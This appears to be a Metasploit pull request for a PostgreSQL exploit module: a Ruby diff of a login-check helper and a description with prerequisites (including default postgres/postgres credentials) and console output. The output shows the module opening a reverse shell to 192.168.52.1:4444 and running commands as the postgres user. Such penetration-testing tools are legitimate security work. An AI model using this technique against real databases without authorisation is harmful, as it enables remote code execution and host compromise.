+      vprint_status("Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}")
 
-			result = postgres_fingerprint(
-					:db => database,
-					:username => user,
-					:password => password
-			)
+      result = postgres_fingerprint(
+        db: database,
+        username: user,
+        password: password
+      )
 
-			if result[:auth]
-				report_service(
-						:host => rhost,
-						:port => rport,
-						:name => "postgres",
-						:info => result.values.first
-				)
-				return result[:auth]
+      if result[:auth]
+        return result[:auth]
 
-			else
-				print_status("Login failed, fingerprint is #{result[:preauth] || result[:unknown]}")
-				return :noauth
-			end
+      else
+        print_status("Login failed, fingerprint is #{result[:preauth] || result[:unknown]}")
+        return :noauth
+      end
 
-		rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError
-			return :noconn
-		end
-	end
+    rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError
+      return :noconn
+    end
+  end
 end


### PR DESCRIPTION
## Description

Add exploit module for Postgres. Postgres has built-in functionality to allow DBA's to execute code in the database server. This can be leveraged to compromise the host.

Tested on OS X, Windows, and Linux Postgres 9 with Perl and Python.
## Steps to reproduce
- Running Postgres with ability to login remotely to superuser (most installs this is not the default, but many are configured to do this anyway)
- plperl or plpython extensions installed in the database server (not all packages do this by default, but some admins install separately)
- Perl or Python installed on the host
- Credentials for the superuser (default is postgres/postgres for some packages, but of course the username and password can be changed)
- For OS X: http://postgresapp.com/ (comes pre-configured with plperl and plpython)
- For Linux: See your package management system
- For Windows: http://www.postgresql.org/download/windows/ (comes pre-configured with plperl and plpython, just install Perl or Python from ActiveState or Python.org, respectively.
## Console output

```
msf > use exploit/multi/postgres/postgres_createlang 
msf exploit(postgres_createlang) > set RHOST 192.168.52.178
RHOST => 192.168.52.178
msf exploit(postgres_createlang) > exploit

[*] Started reverse TCP double handler on 192.168.52.1:4444 
[*] 192.168.52.178:5432 - PostgreSQL 9.4.5 on x86_64-unknown-linux-gnu, compiled by gcc (Ubuntu 5.2.1-21ubuntu2) 5.2.1 20151003, 64-bit
[*] Selecting version 9 payload
[!] This exploit does not clean up after itself - you will need to do that manually
[*] Attempting to load Perl
[+] Perl is already loaded, continuing
[+] Loaded UDF
[+] Starting payload
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 07AECD1gL1Y1TQzG;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "07AECD1gL1Y1TQzG\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.52.1:4444 -> 192.168.52.178:39394) at 2016-01-01 03:49:36 -0800

id
uid=110(postgres) gid=118(postgres) groups=118(postgres),117(ssl-cert)
```

When a language isn't available, such as Perl not installed:

```
[...]
[!] This exploit does not clean up after itself - you will need to do that manually
[*] Attempting to load Perl6
[*] Perl6 could not be loaded
[*] Attempting to load Python
[+] Python is already loaded, continuing
[+] Loaded UDF
[+] Starting payload
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo BLPPVzX9m4hkmZaQ;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "BLPPVzX9m4hkmZaQ\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.52.1:4444 -> 192.168.52.178:39406) at 2016-01-01 04:17:50 -0800

id
uid=110(postgres) gid=118(postgres) groups=118(postgres),117(ssl-cert)
```
## Notes

There are two states that a configured Postgres server can have:
- Perl or Python configured and installed, but not loaded in to the database.
- Perl or Python configure and installed, and loaded in to the database.

For tidiness during an engagement, this module alerts you to these states so that you can clean up after yourself. However, this module does not (yet) automatically clean up.
